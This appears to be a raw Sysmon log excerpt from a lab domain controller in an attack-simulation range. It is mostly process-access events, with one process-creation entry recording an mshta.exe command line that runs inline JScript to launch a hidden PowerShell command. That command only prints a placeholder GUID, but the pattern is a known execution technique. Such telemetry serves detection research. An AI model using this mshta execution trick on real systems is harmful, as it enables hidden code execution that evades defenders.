15:59:46.381{7901BC46-4987-6008-1600-00000000A301}15362116C:\Windows\system32\svchost.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027962Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.381{7901BC46-4987-6008-1600-00000000A301}15361576C:\Windows\system32\svchost.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027961Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.365{7901BC46-4A88-6008-F200-00000000A301}19122148C:\Windows\system32\csrss.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027960Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.365{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027959Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.365{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027958Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.365{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027957Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.365{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000027956Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.365{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000027955Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.365{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4 154100x800000000000000027954Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.373{7901BC46-5372-6008-7D06-00000000A301}1804C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\System32\mshta.exe" "about:<hta:application><script language="JScript.Compact">a=new%%20ActiveXObject("WScript.Shell");a.Run("powershell.exe%%20-nop%%20-Command%%20Write-Host%%20aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa;%%20Start-Sleep%%20-Seconds%%202;%%20exit",0,true);close();</script>'"C:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-5350-6008-1E06-00000000A301}6628C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x800000000000000027953Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7C06-00000000A301}5872C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027952Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7B06-00000000A301}5760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027951Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5371-6008-7A06-00000000A301}1132C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027950Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027949Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027948Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027947Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027946Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027945Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027944Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027943Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027942Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027941Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:46.350{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000027940Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 